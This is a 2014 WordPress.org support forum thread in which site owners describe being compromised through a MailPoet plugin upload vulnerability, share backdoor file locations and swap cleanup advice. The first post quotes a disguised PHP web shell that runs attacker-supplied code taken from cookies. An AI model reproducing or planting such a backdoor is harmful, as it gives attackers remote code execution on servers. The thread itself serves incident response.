WordPress.org

Forums

MailPoet Newsletters
[resolved] Plugin Hacked (24 posts)

  1. webmistress666
    Member
    Posted 9 months ago #

    2.6.8 - 2014-07-04

    Fixed security issue reported by Dominic

    Well, I'm hoping this was the culprit, but regardless, our site was compromised via Mail Poet last week. There was a backdoor being used to send out massive amounts of spam and our webhost had to shut it down.

    Files were found in:

    wp-content/upgrade/
    wp-content/uploads/ (a file called ajax.php)
    wp-content/uploads/wysija/themes/main/
    wp-content/uploads/wysija/themes/main2/

    These were always .php files, sometimes with a gibberish name, other times with a name like "ajax.php" or "index.php" where there shouldn't have been one (in the themes folders).

    The index.php file inside the "wysija/themes/main/" folders looked like this:

    <?php
    /**
     * @package     Joomla.Plugin.System
     * @since       1.5
     *
     *
     */
    class PlgSysJoomla {
    public function __construct() {
    $file=@$_COOKIE['ljNqe3'];
    if ($file){ $opt=$file(@$_COOKIE['ljNqe2']); $au=$file(@$_COOKIE['ljNqe1']); $opt("/292/e",$au,292); die();} else {phpinfo();die;}}}
    $index=new PlgSysJoomla;

    Anyway, anyone else have these issues? I updated Mail Poet, deleted all suspicious files, changed my FTP password, and am hoping that's enough.

    https://wordpress.org/plugins/wysija-newsletters/

  2. AddyBean
    Member
    Posted 9 months ago #

    Yes! http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html

    I'm in the process of backing everything up and plan to wipe out the whole WordPress directory and reinstall. I'm not sure if there are added files in there, but many of the existing ones have been modified with an eval and base 64 code at the top. It looks like it's managed to get into everything, not just the uploads area.

    What I can't figure out is if it could have inserted itself into the database proper, or if it just modified the WordPress directory. I'm hoping a reinstall alone will take care of it. Not sure how to go about checking the database for issues. Been through those links that keep getting posted here everytime someone says they've been hacked and still can't find an answer to the db question.

  3. webmistress666
    Member
    Posted 9 months ago #

    Awesome, thanks for the link! We've had our site hacked before, years ago, and it was just like you're describing with the base 64 encode. It was a TOTAL NIGHTMARE. We ended up just exporting all our content via WordPress to an XML file, wiping the installation entirely, installing a new one, and then importing the posts.

    Luckily, that's not happening to us currently. I'm hoping we managed to catch it in time. There were only about 4 suspicious files and nothing was encoded. Still, I'll be sure to keep an eye out for anything fishy.

    Good luck with yours.

  4. dotlizard
    Member
    Posted 9 months ago #

    I cleaned the initial infection, but there were backdoors -- it roamed all through my webserver, with that base64 thing. I spent 8 hours cleaning everything, and it's been clear since. I'm unwilling to do the "export everything then burn it with fire" approach just yet, but if it comes back I might have to.

    I'm kind of bothered that there isn't more information on this at MailPoet's site, at least a knowledge base article on the subject. To acknowledge such a severe vulnerability as a line item on a changelog seems a bit irresponsible, considering they gave hackers console-level access to our servers for four days.

  5. esmi
    Forum Moderator
    Posted 9 months ago #

    What makes you think that the plugin had anything to do with the hack as opposed to simply being a victim of it?

  6. webmistress666
    Member
    Posted 9 months ago #

    Did you read the link AddyBean posted?

    In my case, the first files were uploaded to the wysija/themes directory, which is what tipped me off to it being a hole in the plugin. Logs and security fixes confirmed.

  7. aral.ici
    Member
    Posted 9 months ago #

    Hi there, all of my sites with MailPoet have been hacked. I'm pretty sure at least one of them has the last version, so for now I just delete the plugin.

  8. aral.ici
    Member
    Posted 9 months ago #

    A little update: actually, a file was uploaded to the themes directory on July 5 BEFORE updating MailPoet, and it's only in the night of Thursday the 17 at 23:45 (French time) that the flaw was exploited. So the current version may be clean, but despite updating the plugin, the flaw may persist because of the infected file in wp-content/upload/wysija/themes/*/*.php.

    Sorry for my bad English.

  9. kaostik
    Member
    Posted 9 months ago #

    Hi Aral,
    your problem has been solved?
    I think also be infected since the night of Thursday to Friday.
    Je suis français désolé pour la traduction anglaise.
    Thanks

  10. aral.ici
    Member
    Posted 9 months ago #

    Hi,

    Yes problem solved the hard way:
    - reinstalled WP
    - reinstalled all plugins
    - reinstalled theme
    - verify and correct manually all files not updated in the process (like wp-config.php)
    - verify database for "blank" admin user not be created

    -- français ;) --

    Oui, problème résolu à la sauvage :
    - Réinstallé WP
    - Réinstallé tous les plugins
    - Réinstallé les thèmes
    - Vérification et correction manuelle de tous les fichiers non mis à jour dans le processus (comme wp-config.php)
    - Vérification de la base de données à la recherche d'un utilisateur admin créé en douce (j'ai lu ça sur un forum de sécurité, plusieurs hackers ont exploité la faille donc les attaques peuvent varier de la redirection de site, à la diffusion de malware, et jusqu'à la création de backdoor).

    Pour la petite histoire, j'ai deux sites que je gère qui ont eu le problème (chez ovh, un qui a planté, l'autre que j'ai détecté moi-même une fois la source de l'infection connue), et on a fait appel à moi pour des conseils sur un autre, et enfin pour une intervention sur un quatrième (hébergé chez 1&1 dont l'anti-virus a détecté le problème et passé tous les fichiers php en droit 0200).

    Je pense qu'il y a beaucoup, beaucoup de sites infectés non détectés qui traînent... car comme j'écrivais en anglais ci-dessus, le plug-in à beau être à jour, dans la fenêtre de temps de correction de la faille, des fichiers 'backdoor' ont été envoyés (tous dans wp-content/upload à priori).

    Bon courage !

  11. kaostik
    Member
    Posted 9 months ago #

    Thanks for your answer
    Merci pour tes indications, j'ai déjà tout réinstallé une première fois, réinfecté 48h après, avec ce plugin toujours actif.
    Je viens de le viré, plus les fichiers suspects se trouvant dans upload également.
    J'hésite également a supprimé les données du plugin de ma base de registre.
    J'attends maintenant de voir si je suis de nouveau infecté.
    Pour info, je suis sous ovh et j'avais une page blanche à la place de mon site, tous mes fichiers php étaient touchés.

  12. aral.ici
    Member
    Posted 9 months ago #

    The plugin is supposed to be clean now, so if you were reinfected when you had the latest version, this is probably because of the omission of one of the "backdoor" files... or the plugin is not so secure...

    I don't think you need to delete data in the database, just check if there is no new suspect user.

    ---

    Le plugin est sensé être clean maintenant, donc si tu as été réinfecté alors que tu avais la dernière version, c'est sûrement à cause de l'oubli d'un des fichiers "backdoor"... ou alors que le plugin n'est pas sécurisé que ça.

    Pas besoin de supprimer les données dans la base à priori, mais vérifier qu'il n'y a pas eu d'utilisateur suspect ajouté.

  13. Artemisia1975
    Member
    Posted 9 months ago #

    My site and that of a friend of mine was infected after the release of the update, on July 18. The server blocked my site as malicious and promised to put it back online only deleting the entire site. I have reinstalled WP, reinstalled all plugins, reinstalled theme...

  14. MailPoet Staff
    Member
    Plugin Author

    Posted 9 months ago #

    Hi guys,

    We're really sorry for that.

    We published a guide in our site which can help you recovering your sites:

    http://support.mailpoet.com/knowledgebase/site-hacked-what-to-do/

  15. davydov-denis
    Member
    Posted 9 months ago #

    there was another hack attack recently, it seems it was not related to MailPoet, as some victims did not have it installed:

    http://blog.sucuri.net/2014/07/malware-infection-breaking-wordpress-sites.html

  16. BrooklynBob
    Member
    Posted 9 months ago #

    My site was hacked AFTER 2.6.8 was installed, and as a result, my host shut my site down this morning (with warning). After speaking with my host's tech support, I decided that the best thing to do is to "nuke and pave" - wipe my directories, remove the database and start with a clean installation of WordPress, my theme and plugins, and hopefully restore my. The other alternative, according to them, was to review all of my files and search for malicious code. Unfortunately, Mailpoet's support solution is vague and doesn't really offer a true solution. So, as a result, I'm looking at many hours of work ahead. Thanks a frigging bunch, Mailpoet.

  17. fwchapman
    Member
    Posted 8 months ago #

    One of my client's sites was compromised by the MailPoet vulnerability, but I had 3 months of weekly backups of the entire site (database, folders, and files). I spent 2 hours investigating the infection to determine when and where it entered and how far it spread. I found rogue code (base64, cookie) inserted into some PHP files, and even some modified CSS files. I spent 1 hour recovering the entire site from the most current uninfected backup. Thankfully, site restoration was simple, straightforward, and painless.

    Malware infections like this one are the reason why it is critical to perform regular backups of your entire site. I use the BackUpWordPress plugin on every site I build. It is easy to set up automatic backups of both the database and the file system. I back up the database automatically every day and the complete file system automatically every week, keeping 3 months of both backups on hand, just in case.

    If you're not already making regular backups of your entire site, I highly recommend BackUpWordPress. You can find it here:

    https://wordpress.org/plugins/backupwordpress/

  18. poddys
    Member
    Posted 8 months ago #

    Great information, we got hacked too, and even though most of our site is not WordPress based, ALL of our PHP files had a malicious script added to the beginning.

    I used a free Windows program "replacetext" to scan and replace the code in over 1,000 PHP files (it also takes backups and gives a log of all changes).

    I found a backdoor in wp-content/upload/wysija/themes/*/*.php. - there was an index.php which had been cleaned, but it also had a second script in the file (crafty!). Now that has been removed also.

    Will update if I find anything else unusual.

  19. poddys
    Member
    Posted 8 months ago #

    @fwchapman I also use backupwordpress. It is an excellent plugin.

  20. wing2go
    Member
    Posted 4 months ago #

    Our site was shutdown too and the hosting company citing that this plugin wysija newsletter might have used the website to stage attack. I have no idea, but disable it anyway. I wanted to have the plugin owner to comment it.

  21. MailPoet Staff
    Member
    Plugin Author

    Posted 4 months ago #

    Guys, always keep your MailPoet updated, there's nothing else we can do besides that.

  22. zifawebsolutions
    Member
    Posted 3 months ago #

    Got rid of MailPoet plugin all together and all related files but my website still won't load. See http://adamsparadise.com/

    I followed the uninstall/removal procedure from mailpoet support page and I'm still stuck. Help please, this is affecting my business.

    Regards,
    Sam
    sam@zifawebsolutions.com

  23. MailPoet Staff
    Member
    Plugin Author

    Posted 3 months ago #

    Your website is loading fine on my end: http://imgur.com/oPkZDf9

    Check the beginning of all your .php files for the malware.

  24. zifawebsolutions
    Member
    Posted 3 months ago #

    hi MailPort staff,

    I've actually restored a backup I made 1 month ago, rid of your mailpoet plugin and upgrade wordpress to make it to work.

    Regards,
    Sam

Reply

You must log in to post.

About this Plugin

  • MailPoet Newsletters
  • Frequently Asked Questions
  • Support Threads
  • Reviews

About this Topic

Tags

No tags yet.